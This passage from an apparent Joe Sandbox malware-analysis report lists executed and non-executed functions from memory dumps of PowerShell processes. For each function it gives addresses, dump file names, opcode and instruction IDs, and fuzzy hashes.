                                                                        • Instruction Fuzzy Hash: 1D21D372C0C9854FE755EB1888A60F57BA0FF12384F4800BAC04A9B053EF3678A6CB85
                                                                        Function 00007FF848F343BC Relevance: .1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2387823128.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_7ff848f30000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3793fec22a12fa93fde671fc51f8159fe6a59a426ac23cfb026183345012f4ec
                                                                        • Instruction ID: f054721a5be76344f0e4ad65c0346b2db9d2ebee3e24fc4cd218a5bd81e7b897
                                                                        • Opcode Fuzzy Hash: 3793fec22a12fa93fde671fc51f8159fe6a59a426ac23cfb026183345012f4ec
                                                                        • Instruction Fuzzy Hash: 3911E032D0E9464FE6A4EB6894509B877E0FF643A0B5900F6D01DC31D6DB18AC208395
                                                                        Function 00007FF848E633B5 Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2386803058.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_7ff848e60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                        • Instruction ID: bc0586010bb7648f8a9788ff2eea40288e3a4c6b570a1a89675a5d11dfb431f3
                                                                        • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                        • Instruction Fuzzy Hash: CC01A73010CB0D4FDB44EF0CE051AA6B3E0FB85360F10052DE58AC3651DB32E882CB45

                                                                        Non-executed Functions

                                                                        Function 00007FF848E68BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2386803058.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_7ff848e60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: N_^4$N_^7$N_^F$N_^J
                                                                        • API String ID: 0-3508309026
                                                                        • Opcode ID: eafd3b313e7fad8c214e9a181eb89bab8aa67dcd7a7cfaa920db0e5adb94a3ed
                                                                        • Instruction ID: f18af481f557b0c005d2f7b16879bad207cd7bf6b81cc1df4859641e2e7b9136
                                                                        • Opcode Fuzzy Hash: eafd3b313e7fad8c214e9a181eb89bab8aa67dcd7a7cfaa920db0e5adb94a3ed
                                                                        • Instruction Fuzzy Hash: 29213BF76494257ED3097BBCFC145E93B40EF942B4B4941B2D298CF143EA1470868AD6

                                                                        Executed Functions

                                                                        Function 00007FF848F46605 Relevance: .4, Instructions: 433COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.2592245121.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7ff848f40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6be5b4c8ce7f455742763d94fa19efc2c01aff804fd5dd90958ef9305a6f2480
                                                                        • Instruction ID: 79ead315e81b2f90bcfcabab1eda3a849568a6b60e5354f9a6cfc41af48d6e3b
                                                                        • Opcode Fuzzy Hash: 6be5b4c8ce7f455742763d94fa19efc2c01aff804fd5dd90958ef9305a6f2480
                                                                        • Instruction Fuzzy Hash: A4C13371D0EA895FF79AAB2858145B57BA0EF26B90F1801FBD00DDB0C3EE18A8058755
                                                                        Function 00007FF848F44073 Relevance: .2, Instructions: 182COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.2592245121.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7ff848f40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 16c46761af1cb24c9fc21df80d66b3330851244b26ee341890a1239b2a7273cc
                                                                        • Instruction ID: 3f274bb3274ea81f7b645b526d05e990f18f15241d9d055c838ad63a21195053
                                                                        • Opcode Fuzzy Hash: 16c46761af1cb24c9fc21df80d66b3330851244b26ee341890a1239b2a7273cc
                                                                        • Instruction Fuzzy Hash: 7551F532A0EA8A4FE79AAB1C541167477E1FFB5A54F1801BBC00EE71D7DF14E8158349
                                                                        Function 00007FF848F44370 Relevance: .1, Instructions: 147COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.2592245121.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7ff848f40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1f3b3aa4812990a519750a31665100979e514f46c3fe2a9a26ffbca833cc77cd
                                                                        • Instruction ID: c3a637e676157528216b70f000a466baea520183a2c84431c2642def0be83670
                                                                        • Opcode Fuzzy Hash: 1f3b3aa4812990a519750a31665100979e514f46c3fe2a9a26ffbca833cc77cd
                                                                        • Instruction Fuzzy Hash: F5412832E0EA494FE7A9EB2C64116B477E1EF65B64F0800BBD44DE71D7EB18AC108395
                                                                        Function 00007FF848E79780 Relevance: .1, Instructions: 128COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.2590848194.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7ff848e70000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 759521980fbc17f5efb77ea48bc9864fcab9d618fc252e5e31a5d2da9cf40077
                                                                        • Instruction ID: 5438482103f31188a20417c34ff277606d36e3abb2b31d0db611ec959be44d2c
                                                                        • Opcode Fuzzy Hash: 759521980fbc17f5efb77ea48bc9864fcab9d618fc252e5e31a5d2da9cf40077
                                                                        • Instruction Fuzzy Hash: B231077191CB888FDB1DDB1CA8066A97BF0FB99311F00426FE449C3252CA75A816CBC6
                                                                        Function 00007FF848D5EAA8 Relevance: .1, Instructions: 124COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.2589243481.00007FF848D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D5D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7ff848d5d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8b2d462a52eb631486d575f46d013307f3961f8589a2534b5e1ac62bfb53d04c
                                                                        • Instruction ID: 969d11f54cf3e91b25a85784d03788870fc7083b14dee212d00c7acb28df8445
                                                                        • Opcode Fuzzy Hash: 8b2d462a52eb631486d575f46d013307f3961f8589a2534b5e1ac62bfb53d04c
                                                                        • Instruction Fuzzy Hash: 7941137180EBC44FE756AB399855A523FF0EF53360B1502DFD088CB1A3D625AC4AC7A2
                                                                        Function 00007FF848E7A49C Relevance: .1, Instructions: 99COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.2590848194.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7ff848e70000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9a896fe916cba8460b54a8f296fb7bd43d30383cd7945edfe94997b0c214d63d
                                                                        • Instruction ID: 05e5968bf06c5021fcc15e7f05fc6b0d3bd8dc8d1f51d7401af2142cb25c48b2
                                                                        • Opcode Fuzzy Hash: 9a896fe916cba8460b54a8f296fb7bd43d30383cd7945edfe94997b0c214d63d
                                                                        • Instruction Fuzzy Hash: 2C21283190CB8C8FDB59DB6C984A7E97FE0EB96320F04416FD048C3152DA74A84ACB92
                                                                        Function 00007FF848F440BF Relevance: .1, Instructions: 95COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.2592245121.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7ff848f40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 502732a3076888e80faad3587a916424bf0354a155e8db6a776f21a5d5d1c4c9
                                                                        • Instruction ID: 4477563a22f23f33a44618abdd4b33b6e81ae437e64d15bf0cc93bd1c1a2b68c
                                                                        • Opcode Fuzzy Hash: 502732a3076888e80faad3587a916424bf0354a155e8db6a776f21a5d5d1c4c9
                                                                        • Instruction Fuzzy Hash: EB21C132E0E9874FE7AAEB1C545017466D1FFB4A98F5900BAD01EE71E2CF18DC148349
                                                                        Function 00007FF848F443BC Relevance: .1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.2592245121.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7ff848f40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f6c4cf2447c0969ed72118be426443da8dcfd268ea9db40a034f3c6441c5c5ec
                                                                        • Instruction ID: f0cc865a30f699320a1a051ea62de313054527fc08e1f987b8c0cba4eb82568f
                                                                        • Opcode Fuzzy Hash: f6c4cf2447c0969ed72118be426443da8dcfd268ea9db40a034f3c6441c5c5ec
                                                                        • Instruction Fuzzy Hash: 2E112032E0E8864FE7A4EB2890505B477E0FF34F64F0900B6D00DE31E2DB18AC108388
                                                                        Function 00007FF848E733B5 Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.2590848194.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7ff848e70000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                        • Instruction ID: 24ef75c526cb65825109a4e7586d62867e1718cfd4eae63a3c90891dd0916743
                                                                        • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                        • Instruction Fuzzy Hash: CF01677111CB0D4FDB44EF0CE451AA6B7E0FB95364F50056DE58AC3691DB36E882CB45
                                                                        Function 00007FF848E7A0FB Relevance: .0, Instructions: 38COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.2590848194.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7ff848e70000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f7fbcd684f3b66910b0a469ef7ea1da030d3aecc2cd56ad575e429c386ca79c1
                                                                        • Instruction ID: b2765a3aa4e43bc1fadf619a9d2197aa7e6f1d02c1ced1829d2f366acf6bbdfa
                                                                        • Opcode Fuzzy Hash: f7fbcd684f3b66910b0a469ef7ea1da030d3aecc2cd56ad575e429c386ca79c1
                                                                        • Instruction Fuzzy Hash: 0FF0247A95CA8C4FDB41EF3C98680E57FA0FF66201B0502EBD508C7021EB618848C781

                                                                        Non-executed Functions

                                                                        Function 00007FF848E78BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.2590848194.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7ff848e70000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                                                                        • API String ID: 0-962139525
                                                                        • Opcode ID: abeb164a636677cc6887e92e0af6106cd1dea64905fbed1728c3732dcb008217
                                                                        • Instruction ID: 63ad6347c9b35d5a557e4d70a1f235b63e22809effe47ae7a8015eb5b1719947
                                                                        • Opcode Fuzzy Hash: abeb164a636677cc6887e92e0af6106cd1dea64905fbed1728c3732dcb008217
                                                                        • Instruction Fuzzy Hash: 6721D7F3684925AED209366DB8419EC7780EF543B978A53F3E028CF153EE1864878A95